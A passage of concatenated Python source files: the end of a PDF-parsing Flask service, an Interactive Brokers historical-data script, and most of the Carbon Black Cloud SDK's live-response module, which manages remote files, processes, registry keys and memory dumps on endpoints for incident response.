os.makedirs("outputs")
if global_counter == MaxRow*MaxColumn:
matrix(MaxRow,MaxColumn)
get_null_values(edged.copy(),image)
cv2.imwrite("outputs/output"+str(datetime.now())+"_GOOD.png", image)
MySQLWriter(finalmatrix_to_json(sorted_by_value))
else:
cv2.imwrite("outputs/output"+str(datetime.now())+"_BAD.png", image)
main()
@app.route('/api/v1/parse_json/', methods=['GET'])
def parse_json():
try:
pdf_id = request.args.get('pdfid', '')
threading.Thread(target=ParseKIPTT, args=(pdf_id)).start()
return "True"
except:
return "False"
@app.route('/api/v1/get_json/', methods=['GET'])
def get_json():
return (MySQLFetchAll("SELECT localvalue FROM Outtable WHERE shortname='outjson'")[0]["localvalue"])
app.run(host='127.0.0.1',port=500, threaded=False)
|
ib_hist_general_stk.py
|
# -*- coding: utf-8 -*-
"""
IBAPI - Getting historical data for stocks from different exchanges and geographies
@author: Mayank Rasu (http://rasuquant.com/wp/)
"""
# Import libraries
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from ibapi.contract import Contract
import pandas as pd
import threading
import time
class TradeApp(EWrapper, EClient):
def __init__(self):
EClient.__init__(self, self)
self.data = {}
def historicalData(self, reqId, bar):
if reqId not in self.data:
self.data[reqId] = [{"Date":bar.date,"Open":bar.open,"High":bar.high,"Low":bar.low,"Close":bar.close,"Volume":bar.volume}]
else:
self.data[reqId].append({"Date":bar.date,"Open":bar.open,"High":bar.high,"Low":bar.low,"Close":bar.close,"Volume":bar.volume})
print("reqID:{}, date:{}, open:{}, high:{}, low:{}, close:{}, volume:{}".format(reqId,bar.date,bar.open,bar.high,bar.low,bar.close,bar.volume))
def websocket_con():
app.run()
app = TradeApp()
app.connect("127.0.0.1", 7497, clientId=1)
# starting a separate daemon thread to execute the websocket connection
con_thread = threading.Thread(target=websocket_con, daemon=True)
con_thread.start()
time.sleep(1) # some latency added to ensure that the connection is established
#creating object of the Contract class - will be used as a parameter for other function calls
def generalStk(symbol,currency,exchange,sec_type="STK"):
contract = Contract()
contract.symbol = symbol
contract.secType = sec_type
contract.currency = currency
contract.exchange = exchange
return contract
def histData(req_num,contract,duration,candle_size):
app.reqHistoricalData(reqId=req_num,
contract=contract,
endDateTime='',
durationStr=duration,
barSizeSetting=candle_size,
whatToShow='ADJUSTED_LAST',
useRTH=1,
formatDate=1,
keepUpToDate=0,
chartOptions=[]) # EClient function to request contract details
tickers_data = {"INTC" : {"index":0,"currency":"USD","exchange":"ISLAND"},
"BARC" : {"index":1,"currency":"GBP","exchange":"LSE"},
"INFY" : {"index":2,"currency":"INR","exchange":"NSE"}}
for ticker in tickers_data:
histData(tickers_data[ticker]["index"],
generalStk(ticker,tickers_data[ticker]["currency"],tickers_data[ticker]["exchange"]),
'1 M', '5 mins')
time.sleep(5) # some latency added to ensure that the contract details request has been processed
###################storing trade app object in dataframe#######################
def dataDataframe(ticker_data,TradeApp_obj):
"returns extracted historical data in dataframe format"
df_data = {}
for symbol in ticker_data:
try:
df_data[symbol] = pd.DataFrame(TradeApp_obj.data[ticker_data[symbol]["index"]])
df_data[symbol].set_index("Date",inplace=True)
except:
print("error encountered for {} data....skipping".format(symbol))
return df_data
#extract and store historical data in dataframe
historicalData = dataDataframe(tickers_data,app)
|
live_response_api.py
|
#!/usr/bin/env python3
# *******************************************************
# Copyright (c) VMware, Inc. 2020-2021. All Rights Reserved.
# SPDX-License-Identifier: MIT
# *******************************************************
# *
# * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
# * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
# * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
# * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
# * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""The Live Response API and associated objects."""
from __future__ import absolute_import
from collections import defaultdict
from concurrent.futures import _base, ThreadPoolExecutor
import json
import logging
import queue
import random
import shutil
import string
import threading
import time
from cbc_sdk.platform import Device
from cbc_sdk.errors import TimeoutError, ObjectNotFoundError, ApiError
from cbc_sdk import winerror
OS_LIVE_RESPONSE_ENUM = {
"WINDOWS": 1,
"LINUX": 2,
"MAC": 4
}
log = logging.getLogger(__name__)
class LiveResponseError(Exception):
"""Exception raised for errors with Live Response."""
def __init__(self, details):
"""
Initialize the LiveResponseError.
Args:
details (object): Details of the specific error.
"""
message_list = []
self.details = details
self.win32_error = None
self.decoded_win32_error = ""
# Details object:
# {u'status': u'error', u'username': u'admin', u'device_id': 9, u'name': u'kill',
# u'completion': 1464319733.190924, u'object': 1660, u'session_id': 7, u'result_type': u'WinHresult',
# u'create_time': 1464319733.171967, u'result_desc': u'', u'id': 22, u'result_code': 2147942487}
if self.details.get("status").upper() == "ERROR" and self.details.get("result_type") == "WinHresult":
# attempt to decode the win32 error
win32_error_text = "Unknown Win32 error code"
try:
self.win32_error = int(self.details.get("result_code"))
win32_error_text = "Win32 error code 0x%08X" % (self.win32_error,)
self.decoded_win32_error = winerror.decode_hresult(self.win32_error)
if self.decoded_win32_error:
win32_error_text += " ({0})".format(self.decoded_win32_error)
except Exception:
pass
finally:
message_list.append(win32_error_text)
self.message = ": ".join(message_list)
def __str__(self):
"""
Return the string equivalent of this exception (the exception's message).
Returns:
str: The exception's message.
"""
return self.message
class CbLRSessionBase(object):
"""A Live Response session that interacts with a remote machine."""
MAX_RETRY_COUNT = 5
def __init__(self, cblr_manager, session_id, device_id, session_data=None, thread_pool_count=5):
"""
Initialize the CbLRSessionBase.
Args:
cblr_manager (CbLRManagerBase): The Live Response manager governing this session.
session_id (str): The ID of this session.
device_id (int): The ID of the device (remote machine) we're connected to.
session_data (dict): Additional session data.
thread_pool_count (int): number of workers for async commands (optional)
"""
self.session_id = session_id
self.device_id = device_id
self._cblr_manager = cblr_manager
self._cb = cblr_manager._cb
self._async_executor = None
self._thread_pool_count = thread_pool_count
# TODO: refcount should be in a different object in the scheduler
self._refcount = 1
self._closed = False
self.session_data = session_data
self.os_type = None
self.cblr_base = self._cblr_manager.cblr_base.format(self._cb.credentials.org_key)
def __enter__(self):
"""Enter the Live Response session context."""
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Exit the Live Response session context.
Args:
exc_type (str): Exception type, if any.
exc_val (Exception): Exception value, if any.
exc_tb (str): Exception traceback, if any.
"""
self.close()
def _async_submit(self, func, *args, **kwargs):
"""
Submit a task to the executor, creating it if it doesn't yet exist.
Args:
func (func): A callable to be executed as a background task.
*args (list): Arguments to be passed to the callable.
**kwargs (dict): Keyword arguments to be passed to the callable.
Returns:
Future: A future object representing the background task, which will pass along the result.
"""
if not self._async_executor:
self._async_executor = ThreadPoolExecutor(max_workers=self._thread_pool_count)
return self._async_executor.submit(func, args, kwargs)
def command_status(self, command_id):
"""
Check the status of async command
Args:
command_id (int): command_id
Returns:
status of the command
"""
url = "{cblr_base}/sessions/{0}/commands/{1}".format(self.session_id, command_id, cblr_base=self.cblr_base)
res = self._cb.get_object(url)
return res["status"].upper()
def cancel_command(self, command_id):
"""
Cancel command if it is in status PENDING.
Args:
command_id (int): command_id
"""
url = "{cblr_base}/sessions/{0}/commands/{1}".format(self.session_id, command_id, cblr_base=self.cblr_base)
res = self._cb.get_object(url)
if res["status"].upper() == 'PENDING':
self._cb.delete_object(url)
else:
raise ApiError(f'Cannot cancel command in status {res["status"].upper()}.'
' Only commands in status PENDING can be cancelled.')
def close(self):
"""Close the Live Response session."""
self._cblr_manager.close_session(self.device_id, self.session_id)
self._closed = True
#
# File operations
#
def _submit_get_file(self, file_name):
"""Helper function for submitting get file command"""
data = {"name": "get file", "path": file_name}
resp = self._lr_post_command(data).json()
file_details = resp.get('file_details', None)
if file_details:
file_id = file_details.get('file_id', None)
command_id = resp.get('id', None)
return file_id, command_id
return None, None
def get_raw_file(self, file_name, timeout=None, delay=None, async_mode=False):
"""
Retrieve contents of the specified file on the remote machine.
Args:
file_name (str): Name of the file to be retrieved.
timeout (int): Timeout for the operation.
delay (float): Delay in seconds to wait before command complete.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
object: Contains the data of the file.
"""
file_id, command_id = self._submit_get_file(file_name)
if file_id and command_id:
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._get_raw_file(command_id,
file_id,
timeout,
delay))
else:
return self._get_raw_file(command_id, file_id, timeout, delay)
def _get_raw_file(self, command_id, file_id, timeout=None, delay=None):
self._poll_command(command_id, timeout=timeout, delay=delay)
response = self._cb.session.get("{cblr_base}/sessions/{0}/files/{1}/content".format(
self.session_id, file_id, cblr_base=self.cblr_base), stream=True)
response.raw.decode_content = True
return response.raw
def get_file(self, file_name, timeout=None, delay=None, async_mode=False):
"""
Retrieve contents of the specified file on the remote machine.
Args:
file_name (str): Name of the file to be retrieved.
timeout (int): Timeout for the operation.
delay (float): Delay in seconds to wait before command complete.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
str: Contents of the specified file.
"""
def _get_file():
"""Helper function to get the content of a file"""
fp = self._get_raw_file(command_id, file_id, timeout=timeout, delay=delay)
content = fp.read()
fp.close()
return content
file_id, command_id = self._submit_get_file(file_name)
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: _get_file())
return _get_file()
def delete_file(self, filename, async_mode=False):
"""
Delete the specified file name on the remote machine.
Args:
filename (str): Name of the file to be deleted.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "delete file", "path": filename}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def put_file(self, infp, remote_filename, async_mode=False):
r"""
Create a new file on the remote machine with the specified data.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... lr_session.put_file(open("test.txt", "rb"), r"c:\test.txt")
Args:
infp (object): Python file-like containing data to upload to the remote endpoint.
remote_filename (str): File name to create on the remote endpoint.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "put file", "path": remote_filename}
file_id = self._upload_file(infp)
data["file_id"] = file_id
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def list_directory(self, dir_name, async_mode=False):
r"""
List the contents of a directory on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... pprint.pprint(lr_session.list_directory('C:\\\\temp\\\\'))
[{u'attributes': [u'DIRECTORY'],
u'create_time': 1471897244,
u'filename': u'.',
u'last_access_time': 1476390670,
u'last_write_time': 1476390670,
u'size': 0},
{u'attributes': [u'DIRECTORY'],
u'create_time': 1471897244,
u'filename': u'..',
u'last_access_time': 1476390670,
u'last_write_time': 1476390670,
u'size': 0},
{u'attributes': [u'ARCHIVE'],
u'create_time': 1476390668,
u'filename': u'test.txt',
u'last_access_time': 1476390668,
u'last_write_time': 1476390668,
u'size': 0}]
Args:
dir_name (str): Directory to list. This parameter should end with the path separator.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
list: A list of dicts, each one describing a directory entry.
"""
data = {"name": "directory list", "path": dir_name}
resp = self._lr_post_command(data).json()
command_id = resp.get("id")
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id).get("files", []))
return self._poll_command(command_id).get("files", [])
def create_directory(self, dir_name, async_mode=False):
"""
Create a directory on the remote machine.
Args:
dir_name (str): The new directory name.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "create directory", "path": dir_name}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def _pathsep(self):
"""
Return the path separator used on the target node.
Returns:
str: Path separator used on the target node.
"""
if self.os_type == 1:
# Windows
return "\\"
# Unix/Mac
return '/'
def _path_compose(self, base, new_component, add_end=False):
"""
Compose a new path based on a base and a new component.
Args:
base (str): The base path to be used.
new_component (str): The new component to be appended.
add_end (bool): True to add an extra path separator at the end. Default False.
Returns:
str: The composed path.
"""
sep = self._pathsep()
rc = [base]
if not base.endswith(sep):
rc.append(sep)
rc.append(new_component)
if add_end:
rc.append(sep)
return "".join(rc)
def _path_islink(self, fi):
"""
Determine if the path is a link. Not implemented.
Args:
fi (str): File to check.
Returns:
bool: True if the file is a link, False if not.
"""
# TODO: implement
return False
def walk(self, top, topdown=True, onerror=None, followlinks=False):
r"""
Perform a full directory walk with recursion into subdirectories on the remote machine.
Note: walk does not support async_mode due to its behaviour, it can only be invoked synchronously
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... for entry in lr_session.walk(directory_name):
... print(entry)
('C:\\temp\\', [u'dir1', u'dir2'], [u'file1.txt'])
Args:
top (str): Directory to recurse on.
topdown (bool): If True, start output from top level directory.
onerror (func): Callback if an error occurs. This function is called with one argument (the exception
that occurred).
followlinks (bool): True to follow symbolic links.
Returns:
list: List of tuples containing directory name, subdirectory names, file names.
"""
try:
allfiles = self.list_directory(self._path_compose(top, '*'))
except Exception as err:
if onerror is not None:
onerror(err)
return
dirnames = []
filenames = []
for fn in allfiles:
if "DIRECTORY" in fn["attributes"]:
if fn["filename"] not in (".", ".."):
dirnames.append(fn)
else:
filenames.append(fn)
if topdown:
yield top, [fn["filename"] for fn in dirnames], [fn["filename"] for fn in filenames]
for name in dirnames:
new_path = self._path_compose(top, name['filename'], True)
if followlinks or not self._path_islink(new_path):
for x in self.walk(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, [fn["filename"] for fn in dirnames], [fn["filename"] for fn in filenames]
#
# Process operations
#
def kill_process(self, pid, async_mode=False):
"""
Terminate a process on the remote machine.
Args:
pid (int): Process ID to be terminated.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
bool: True if success, False if failure.
"""
data = {"name": "kill", "pid": pid}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id,
timeout=10,
delay=0.1))
try:
self._poll_command(command_id, timeout=10, delay=0.1)
except TimeoutError:
return False
return True
def create_process(self, command_string, wait_for_output=True, remote_output_file_name=None,
working_directory=None, wait_timeout=30, wait_for_completion=True, async_mode=False):
"""
Create a new process on the remote machine with the specified command string.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... print(lr_session.create_process(r'cmd.exe /c "ping.exe 192.168.1.1"'))
Pinging 192.168.1.1 with 32 bytes of data:
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Args:
command_string (str): Command string used for the create process operation.
wait_for_output (bool): True to block on output from the new process (execute in foreground).
This will also set wait_for_completion (below).
remote_output_file_name (str): The remote output file name used for process output.
working_directory (str): The working directory of the create process operation.
wait_timeout (int): Timeout used for this command.
wait_for_completion (bool): True to wait until the process is completed before returning.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
str: The output of the process.
"""
# process is:
# - create a temporary file name
# - create the process, writing output to a temporary file
# - wait for the process to complete
# - get the temporary file from the endpoint
# - delete the temporary file
def wait_to_complete_command():
if wait_for_completion:
self._poll_command(command_id, timeout=wait_timeout)
if wait_for_output:
# now the file is ready to be read
file_content = self.get_file(data["output_file"])
# delete the file
self._lr_post_command({"name": "delete file", "path": data["output_file"]})
return file_content
else:
return None
if wait_for_output:
wait_for_completion = True
data = {"name": "create process", "path": command_string, "wait": wait_for_completion}
if wait_for_output and not remote_output_file_name:
randfilename = self._random_file_name()
data["output_file"] = randfilename
if working_directory:
data["working_directory"] = working_directory
if remote_output_file_name:
data["output_file"] = remote_output_file_name
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: wait_to_complete_command())
else:
return wait_to_complete_command()
def list_processes(self, async_mode=False):
r"""
List currently running processes on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... print(lr_session.list_processes()[0])
{u'command_line': u'',
u'create_time': 1476260500,
u'parent': 0,
u'parent_guid': u'00000001-0000-0000-0000-000000000000',
u'path': u'',
u'pid': 4,
u'proc_guid': u'00000001-0000-0004-01d2-2461a85e4546',
u'sid': u's-1-5-18',
u'username': u'NT AUTHORITY\\SYSTEM'}
Args:
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
list: A list of dicts describing the processes.
"""
data = {"name": "process list"}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id).get(
"processes", []))
return self._poll_command(command_id).get("processes", [])
#
# Registry operations
#
# returns dictionary with 2 entries ("values" and "sub_keys")
# "values" is a list containing a dictionary for each registry value in the key
# "sub_keys" is a list containing one entry for each sub_key
def list_registry_keys_and_values(self, regkey, async_mode=False):
r"""
Enumerate subkeys and values of the specified registry key on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
>>> pprint.pprint(lr_session.list_registry_keys_and_values('HKLM\\SYSTEM\\CurrentControlSet\\services\\ACPI'))
{'sub_keys': [u'Parameters', u'Enum'],
'values': [{u'value_data': 0,
u'value_name': u'Start',
u'value_type': u'REG_DWORD'},
{u'value_data': 1,
u'value_name': u'Type',
u'value_type': u'REG_DWORD'},
{u'value_data': 3,
u'value_name': u'ErrorControl',
u'value_type': u'REG_DWORD'},
{u'value_data': u'system32\\drivers\\ACPI.sys',
u'value_name': u'ImagePath',
u'value_type': u'REG_EXPAND_SZ'},
{u'value_data': u'Microsoft ACPI Driver',
u'value_name': u'DisplayName',
u'value_type': u'REG_SZ'},
{u'value_data': u'Boot Bus Extender',
u'value_name': u'Group',
u'value_type': u'REG_SZ'},
{u'value_data': u'acpi.inf_x86_neutral_ddd3c514822f1b21',
u'value_name': u'DriverPackageId',
u'value_type': u'REG_SZ'},
{u'value_data': 1,
u'value_name': u'Tag',
u'value_type': u'REG_DWORD'}]}
Args:
regkey (str): The registry key to enumerate.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
dict: A dictionary with two keys, 'sub_keys' (a list of subkey names) and 'values' (a list of dicts
containing value data, name, and type).
"""
def _list_registry_keys_and_values():
"""Helper function for list registry keys and values"""
raw_output = self._poll_command(command_id)
return {'values': raw_output.get('values', []), 'sub_keys': raw_output.get('sub_keys', [])}
data = {"name": "reg enum key", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: _list_registry_keys_and_values())
return _list_registry_keys_and_values()
# returns a list containing a dictionary for each registry value in the key
def list_registry_values(self, regkey, async_mode=False):
"""
Enumerate all registry values from the specified registry key on the remote machine.
Args:
regkey (str): The registry key to enumerate.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
list: List of values for the registry key.
"""
data = {"name": "reg enum key", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id).get(
"values", []))
return self._poll_command(command_id).get("values", [])
# returns a dictionary with the registry value
def get_registry_value(self, regkey, async_mode=False):
r"""
Return the associated value of the specified registry key on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
>>> pprint.pprint(lr_session.get_registry_value('HKLM\\SYSTEM\\CurrentControlSet\\services\\ACPI\\Start'))
{u'value_data': 0, u'value_name': u'Start', u'value_type': u'REG_DWORD'}
Args:
regkey (str): The registry key to retrieve.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
or
dict: A dictionary with keys of: value_data, value_name, value_type.
"""
data = {"name": "reg query value", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id).get(
"value", {}))
return self._poll_command(command_id).get("value", {})
def set_registry_value(self, regkey, value, overwrite=True, value_type=None, async_mode=False):
r"""
Set a registry value on the specified registry key on the remote machine.
Example:
>>> with c.select(Device, 1).lr_session() as lr_session:
... lr_session.set_registry_value('HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\ACPI\\\\testvalue', 1)
Args:
regkey (str): The registry key to set.
value (object): The value data.
overwrite (bool): If True, any existing value will be overwritten.
value_type (str): The type of value. Examples: REG_DWORD, REG_MULTI_SZ, REG_SZ
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
real_value = value
if value_type is None:
if type(value) == int:
value_type = "REG_DWORD"
elif type(value) == list:
value_type = "REG_MULTI_SZ"
real_value = [str(item) for item in list(value)]
else:
value_type = "REG_SZ"
real_value = str(value)
data = {"name": "reg set value", "path": regkey, "overwrite": overwrite, "value_type": value_type,
"value_data": real_value}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def create_registry_key(self, regkey, async_mode=False):
"""
Create a new registry key on the remote machine.
Args:
regkey (str): The registry key to create.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "reg create key", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def delete_registry_key(self, regkey, async_mode=False):
"""
Delete a registry key on the remote machine.
Args:
regkey (str): The registry key to delete.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "reg delete key", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
def delete_registry_value(self, regkey, async_mode=False):
"""
Delete a registry value on the remote machine.
Args:
regkey (str): The registry value to delete.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
data = {"name": "reg delete value", "path": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if async_mode:
return command_id, self._async_submit(lambda arg, kwarg: self._poll_command(command_id))
self._poll_command(command_id)
#
# Physical memory capture
#
def memdump(self, local_filename, remote_filename=None, compress=False, async_mode=False):
"""
Perform a memory dump operation on the remote machine.
Args:
local_filename (str): Name of the file the memory dump will be transferred to on the local machine.
remote_filename (str): Name of the file the memory dump will be stored in on the remote machine.
compress (bool): True to compress the file on the remote system.
async_mode (bool): Flag showing whether the command should be executed asynchronously
Returns:
command_id, future if ran async
"""
def _memdump():
"""Helper function for memdump"""
dump_object.wait()
dump_object.get(local_filename)
dump_object.delete()
dump_object = self.start_memdump(remote_filename=remote_filename, compress=compress)
if async_mode:
return dump_object.memdump_id, self._async_submit(lambda arg, kwarg: _memdump())
_memdump()
def start_memdump(self, remote_filename=None, compress=True):
"""
Start a memory dump operation on the remote machine.
Args:
remote_filename (str): Name of the file the memory dump will be stored in on the remote machine.
compress (bool): True to compress the file on the remote system.
Returns:
LiveResponseMemdump: Controlling object for the memory dump operation.
"""
if not remote_filename:
remote_filename = self._random_file_name()
data = {"name": "memdump", "path": remote_filename, "compress": compress}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if compress:
remote_filename += ".zip"
return LiveResponseMemdump(self, command_id, remote_filename)
def _random_file_name(self):
randfile = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(12)])
if self.os_type == 1:
workdir = 'c:\\windows\\temp'
else:
workdir = '/tmp'
return self._path_compose(workdir, f'cblr.{randfile}.tmp')
def _poll_command(self, command_id, **kwargs):
return poll_status(self._cb, "{cblr_base}/sessions/{0}/commands/{1}".format(self.session_id, command_id,
cblr_base=self.cblr_base),
**kwargs)
def _upload_file(self, fp):
resp = self._cb.session.post("{cblr_base}/sessions/{0}/files".format(self.session_id, cblr_base=self.cblr_base),
files={"file": fp}).json()
return resp.get('id')
def _lr_post_command(self, data):
retries = self.MAX_RETRY_COUNT
if "name" in data and data["name"] not in self.session_data["supported_commands"]:
raise ApiError("Command {0} not supported by this device".format(data["name"]))
while retries:
try:
data["session_id"] = self.session_id
resp = self._cb.post_object("{cblr_base}/sessions/{0}/commands".format(self.session_id,
cblr_base=self.cblr_base), data)
except ObjectNotFoundError as e:
try:
error_message = json.loads(e.message)
if error_message["error_code"] == "NOT_FOUND":
self.session_id, self.session_data = \
self._cblr_manager._get_or_create_session(self.device_id)
retries -= 1
continue
except Exception:
pass
raise ApiError("Received 404 error from server: {0}".format(e.message))
else:
return resp
raise TimeoutError(message="Command {0} failed after {1} retries".format(data["name"], self.MAX_RETRY_COUNT))
class LiveResponseMemdump(object):
"""Object managing a memory dump on a remote machine."""
def __init__(self, lr_session, memdump_id, remote_filename):
"""
Initialize the LiveResponseMemdump.
Args:
lr_session (Session): The Live Response session to the machine doing the memory dump.
memdump_id (str): The ID of the memory dump being performed.
remote_filename (str): The file name the memory dump will be stored in on the remote machine.
"""
self.lr_session = lr_session
self.memdump_id = memdump_id
self.remote_filename = remote_filename
self._done = False
self._error = None
def get(self, local_filename):
"""
Retrieve the remote memory dump to a local file.
Args:
local_filename (str): Filename locally that will receive the memory dump.
"""
if not self._done:
self.wait()
if self._error:
raise self._error
src = self.lr_session.get_raw_file(self.remote_filename, timeout=3600, delay=5)
dst = open(local_filename, "wb")
shutil.copyfileobj(src, dst)
def wait(self):
"""Wait for the remote memory dump to complete."""
self.lr_session._poll_command(self.memdump_id, timeout=3600, delay=5)
self._done = True
def delete(self):
"""Delete the memory dump file."""
self.lr_session.delete_file(self.remote_filename)
def jobrunner(callable, cb, device_id):
"""
Wrap a callable object with a live response session.
Args:
callable (object): The object to be wrapped.
cb (BaseAPI): The CBC SDK object reference.
device_id (int): The device ID to use to get the session.
Returns:
object: The wrapped object.
"""
with cb.select(Device, device_id).lr_session() as sess:
return callable(sess)
class WorkItem(object):
"""Work item for scheduling."""
def __init__(self, fn, device_id):
"""
Initialize the WorkItem.
Args:
fn (func): The function to be called to do the actual work.
device_id (object): The device ID or Device object the work item is directed for.
"""
self.fn = fn
if isinstance(device_id, Device):
self.device_id = device_id.id
else:
self.device_id = int(device_id)
self.future = _base.Future()
class CompletionNotification(object):
"""The notification that an operation is complete."""
def __init__(self, device_id):
"""
Initialize the CompletionNotification.
Args:
device_id (int): The device ID this notification is for.
"""
self.device_id = device_id
class WorkerStatus(object):
"""Holds the status of an individual worker."""
def __init__(self, device_id, status="READY", exception=None):
"""
Initialize the WorkerStatus.
Args:
device_id (int): The device ID this status is for.
status (str): The current status value.
exception (Exception): Any exception that happened.
"""
self.device_id = device_id
self.status = status
self.exception = exception
class JobWorker(threading.Thread):
"""Thread object that executes individual Live Response jobs."""
def __init__(self, cb, device_id, result_queue):
"""
Initialize the JobWorker.
Args:
cb (BaseAPI): The CBC SDK object reference.
device_id (int): The ID of the device being used.
result_queue (Queue): The queue where results are placed.
"""
super(JobWorker, self).__init__()
self.cb = cb
self.device_id = device_id
self.job_queue = queue.Queue()
self.lr_session = None
self.result_queue = result_queue
def run(self):
"""Execute the job worker."""
try:
self.lr_session = self.cb.live_response.request_session(self.device_id)
self.result_queue.put(WorkerStatus(self.device_id, status="READY"))
while True:
work_item = self.job_queue.get(block=True)
if not work_item:
self.job_queue.task_done()
return
self.run_job(work_item)
self.result_queue.put(CompletionNotification(self.device_id))
self.job_queue.task_done()
except Exception as e:
self.result_queue.put(WorkerStatus(self.device_id, status="ERROR", exception=e))
finally:
if self.lr_session:
self.lr_session.close()
self.result_queue.put(WorkerStatus(self.device_id, status="EXISTING"))
def run_job(self, work_item):
"""
Execute an individual WorkItem.
Args:
work_item (WorkItem): The work item to execute.
"""
try:
work_item.future.set_result(work_item.fn(self.lr_session))
except Exception as e:
work_item.future.set_exception(e)
class LiveResponseJobScheduler(threading.Thread):
"""Thread that schedules Live Response jobs."""
daemon = True
def __init__(self, cb, max_workers=10):
"""
Initialize the LiveResponseJobScheduler.
Args:
cb (BaseAPI): The CBC SDK object reference.
max_workers (int): Maximum number of JobWorker threads to use.
"""
super(LiveResponseJobScheduler, self).__init__()
self._cb = cb
self._job_workers = {}
self._idle_workers = set()
self._unscheduled_jobs = defaultdict(list)
self._max_workers = max_workers
self.schedule_queue = queue.Queue()
def run(self):
"""Execute the job scheduler."""
log.debug("Starting Live Response Job Scheduler")
while True:
log.debug("Waiting for item on Scheduler Queue")
item = self.schedule_queue.get(block=True)
log.debug("Got item: {0}".format(item))
if isinstance(item, WorkItem):
# new WorkItem available
self._unscheduled_jobs[item.device_id].append(item)
elif isinstance(item, CompletionNotification):
# job completed
self._idle_workers.add(item.device_id)
elif isinstance(item, WorkerStatus):
if item.status == "ERROR":
log.error("Error encountered by JobWorker[{0}]: {1}".format(item.device_id,
item.exception))
# Don't reattempt error'd jobs
del self._unscheduled_jobs[item.device_id]
elif item.status == "EXISTING":
log.debug("JobWorker[{0}] has exited, waiting...".format(item.device_id))
self._job_workers[item.device_id].join()
log.debug("JobWorker[{0}] deleted".format(item.device_id))
del self._job_workers[item.device_id]
try:
self._idle_workers.remove(item.device_id)
except KeyError:
pass
elif item.status == "READY":
log.debug("JobWorker[{0}] now ready to accept jobs, session established".format(item.device_id))
self._idle_workers.add(item.device_id)
else:
log.debug("Unknown status from JobWorker[{0}]: {1}".format(item.device_id, item.status))
else:
log.debug("Received unknown item on the scheduler Queue, exiting")
